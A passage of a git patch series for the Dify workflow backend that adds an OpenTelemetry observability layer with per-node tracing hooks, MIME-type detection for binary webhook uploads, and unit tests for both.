execution_id: + return + node_context = self._node_contexts.get(execution_id) + if not node_context: + return + + span = node_context.span + parser = self._get_parser(node) + try: + parser.parse(node=node, span=span, error=error) + span.end() + finally: + token = node_context.token + if token is not None: + try: + context_api.detach(token) + except Exception: + logger.warning("Failed to detach OpenTelemetry token: %s", token) + self._node_contexts.pop(execution_id, None) + + except Exception as e: + logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_event(self, event) -> None: + """Not used in this layer.""" + pass + + @override + def on_graph_end(self, error: Exception | None) -> None: + """Called when graph execution ends.""" + if self._node_contexts: + logger.warning( + "ObservabilityLayer: %d node spans were not properly ended", + len(self._node_contexts), + ) + self._node_contexts.clear() diff --git a/api/core/workflow/graph_engine/worker.py b/api/core/workflow/graph_engine/worker.py index 73e59ee298..e37a08ae47 100644 --- a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class WorkerPool: ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: list[GraphEngineLayer], flask_app: "Flask | None" = None, context_vars: "Context | None" = None, min_workers: int | None = None, @@ -53,6 +55,7 @@ class WorkerPool: ready_queue: Ready queue for nodes ready for execution event_queue: Queue for worker events graph: The workflow graph + layers: Graph engine layers for node execution hooks flask_app: Optional Flask app for context preservation context_vars: Optional context variables min_workers: Minimum number of workers @@ -65,6 +68,7 @@ class WorkerPool: self._graph = graph self._flask_app = flask_app self._context_vars = context_vars + self._layers = layers # Scaling parameters with defaults self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS @@ -144,6 +148,7 @@ class WorkerPool: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, worker_id=worker_id, flask_app=self._flask_app, context_vars=self._context_vars, diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py index c2e1105971..8ebba3659c 100644 --- a/api/core/workflow/nodes/base/node.py +++ b/api/core/workflow/nodes/base/node.py @@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]): def graph_init_params(self) -> "GraphInitParams": return self._graph_init_params + @property + def execution_id(self) -> str: + return self._node_execution_id + + def ensure_execution_id(self) -> str: + if not self._node_execution_id: + self._node_execution_id = str(uuid4()) + return self._node_execution_id + def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT: return cast(NodeDataT, self._node_data_type.model_validate(data)) @@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]): raise NotImplementedError def run(self) -> Generator[GraphNodeEventBase, None, None]: - # Generate a single node execution ID to use for all events - if not self._node_execution_id: - self._node_execution_id = str(uuid4()) + execution_id = self.ensure_execution_id() self._start_at = naive_utc_now() # Create and push start event with required fields start_event = NodeRunStartedEvent( - id=self._node_execution_id, + id=execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.title, @@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]): if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance] yield self._dispatch(event) elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance] - event.id = self._node_execution_id + event.id = self.execution_id yield event else: yield event @@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]): error_type="WorkflowNodeError", ) yield NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]): match result.status: case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent: return NodeRunStreamChunkEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, selector=event.selector, @@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]): match event.node_run_result.status: case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent: return NodeRunPauseRequestedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED), @@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent: return NodeRunAgentLogEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, message_id=event.message_id, @@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent: return NodeRunLoopStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent: return NodeRunLoopNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent: return NodeRunLoopSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent: return NodeRunLoopFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent: return NodeRunIterationStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent: return NodeRunIterationNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent: return NodeRunIterationSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent: return NodeRunIterationFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent: return NodeRunRetrieverResourceEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, retriever_resources=event.retriever_resources, diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py index d4ec29518a..ddf545bb34 100644 --- a/api/core/workflow/workflow_entry.py +++ b/api/core/workflow/workflow_entry.py @@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError from core.workflow.graph import Graph from core.workflow.graph_engine import GraphEngine from core.workflow.graph_engine.command_channels import InMemoryChannel -from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer +from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent from core.workflow.nodes import NodeType @@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING from core.workflow.runtime import GraphRuntimeState, VariablePool from core.workflow.system_variable import SystemVariable from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool +from extensions.otel.runtime import is_instrument_flag_enabled from factories import file_factory from models.enums import UserFrom from models.workflow import Workflow @@ -98,6 +99,10 @@ class WorkflowEntry: ) self.graph_engine.layer(limits_layer) + # Add observability layer when OTel is enabled + if dify_config.ENABLE_OTEL or is_instrument_flag_enabled(): + self.graph_engine.layer(ObservabilityLayer()) + def run(self) -> Generator[GraphEngineEvent, None, None]: graph_engine = self.graph_engine diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py index 9604a3b6d5..14221d24dd 100644 --- a/api/extensions/otel/decorators/base.py +++ b/api/extensions/otel/decorators/base.py @@ -1,5 +1,4 @@ import functools -import os from collections.abc import Callable from typing import Any, TypeVar, cast @@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer from configs import dify_config from extensions.otel.decorators.handler import SpanHandler +from extensions.otel.runtime import is_instrument_flag_enabled T = TypeVar("T", bound=Callable[..., Any]) _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()} -def _is_instrument_flag_enabled() -> bool: - """ - Check if external instrumentation is enabled via environment variable. - - Third-party non-invasive instrumentation agents set this flag to coordinate - with Dify's manual OpenTelemetry instrumentation. - """ - return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" - - def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler: """Get or create a singleton instance of the handler class.""" if handler_class not in _HANDLER_INSTANCES: @@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T], def decorator(func: T) -> T: @functools.wraps(func) def wrapper(*args: Any, **kwargs: Any) -> Any: - if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()): + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): return func(*args, **kwargs) handler = _get_handler_instance(handler_class or SpanHandler) diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py index 16f5ccf488..a7181d2683 100644 --- a/api/extensions/otel/runtime.py +++ b/api/extensions/otel/runtime.py @@ -1,4 +1,5 @@ import logging +import os import sys from typing import Union @@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs): if dify_config.DEBUG: logger.info("Initializing OpenTelemetry for Celery worker") CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument() + + +def is_instrument_flag_enabled() -> bool: + """ + Check if external instrumentation is enabled via environment variable. + + Third-party non-invasive instrumentation agents set this flag to coordinate + with Dify's manual OpenTelemetry instrumentation. + """ + return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared fixtures for ObservabilityLayer tests. +""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. + +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 From 7695f9151c67fa52a2bebcbd788bf7d5bd875051 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=9D=9E=E6=B3=95=E6=93=8D=E4=BD=9C?= Date: Tue, 16 Dec 2025 13:34:27 +0800 Subject: [PATCH 45/68] chore: webhook with bin file should guess mimetype (#29704) Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> Co-authored-by: Maries --- api/services/trigger/webhook_service.py | 20 +++++- .../services/test_webhook_service.py | 64 +++++++++++++++++++ 2 files changed, 83 insertions(+), 1 deletion(-) diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py index 4b3e1330fd..5c4607d400 100644 --- a/api/services/trigger/webhook_service.py +++ b/api/services/trigger/webhook_service.py @@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError from services.trigger.app_trigger_service import AppTriggerService from services.workflow.entities import WebhookTriggerData +try: + import magic +except ImportError: + magic = None # type: ignore[assignment] + logger = logging.getLogger(__name__) @@ -317,7 +322,8 @@ class WebhookService: try: file_content = request.get_data() if file_content: - file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger) + mimetype = cls._detect_binary_mimetype(file_content) + file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger) return {"raw": file_obj.to_dict()}, {} else: return {"raw": None}, {} @@ -341,6 +347,18 @@ class WebhookService: body = {"raw": ""} return body, {} + @staticmethod + def _detect_binary_mimetype(file_content: bytes) -> str: + """Guess MIME type for binary payloads using python-magic when available.""" + if magic is not None: + try: + detected = magic.from_buffer(file_content[:1024], mime=True) + if detected: + return detected + except Exception: + logger.debug("python-magic detection failed for octet-stream payload") + return "application/octet-stream" + @classmethod def _process_file_uploads( cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 920b1e91b6..d788657589 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -110,6 +110,70 @@ class TestWebhookServiceUnit: assert webhook_data["method"] == "POST" assert webhook_data["body"]["raw"] == "raw text content" + def test_extract_octet_stream_body_uses_detected_mime(self): + """Octet-stream uploads should rely on detected MIME type.""" + app = Flask(__name__) + binary_content = b"plain text data" + + with app.test_request_context( + "/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content + ): + webhook_trigger = MagicMock() + mock_file = MagicMock() + mock_file.to_dict.return_value = {"file": "data"} + + with ( + patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect, + patch.object(WebhookService, "_create_file_from_binary") as mock_create, + ): + mock_create.return_value = mock_file + body, files = WebhookService._extract_octet_stream_body(webhook_trigger) + + assert body["raw"] == {"file": "data"} + assert files == {} + mock_detect.assert_called_once_with(binary_content) + mock_create.assert_called_once() + args = mock_create.call_args[0] + assert args[0] == binary_content + assert args[1] == "text/plain" + assert args[2] is webhook_trigger + + def test_detect_binary_mimetype_uses_magic(self, monkeypatch): + """python-magic output should be used when available.""" + fake_magic = MagicMock() + fake_magic.from_buffer.return_value = "image/png" + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "image/png" + fake_magic.from_buffer.assert_called_once() + + def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch): + """Fallback MIME type should be used when python-magic is unavailable.""" + monkeypatch.setattr("services.trigger.webhook_service.magic", None) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + + def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch): + """Fallback MIME type should be used when python-magic raises an exception.""" + try: + import magic as real_magic + except ImportError: + pytest.skip("python-magic is not installed") + + fake_magic = MagicMock() + fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error") + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + with patch("services.trigger.webhook_service.logger") as mock_logger: + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + mock_logger.debug.assert_called_once() + def test_extract_webhook_data_invalid_json(self): """Test webhook data extraction with invalid JSON.""" app = Flask(__name__) From 4553e4c12f9852d430259f2a76f3e029e6f44755 Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Tue, 16 Dec 2025 14:18:09 +0800 Subject: [PATCH 46/68] test: add comprehensive Jest tests for CustomPage and WorkflowOnboardingModal components (#29714) --- .../custom/custom-page/index.spec.tsx | 500 +++++++++++++ .../common/document-picker/index.spec.tsx | 7 - .../preview-document-picker.spec.tsx | 2 +- .../retrieval-method-config/index.spec.tsx | 7 - .../workflow-onboarding-modal/index.spec.tsx | 686 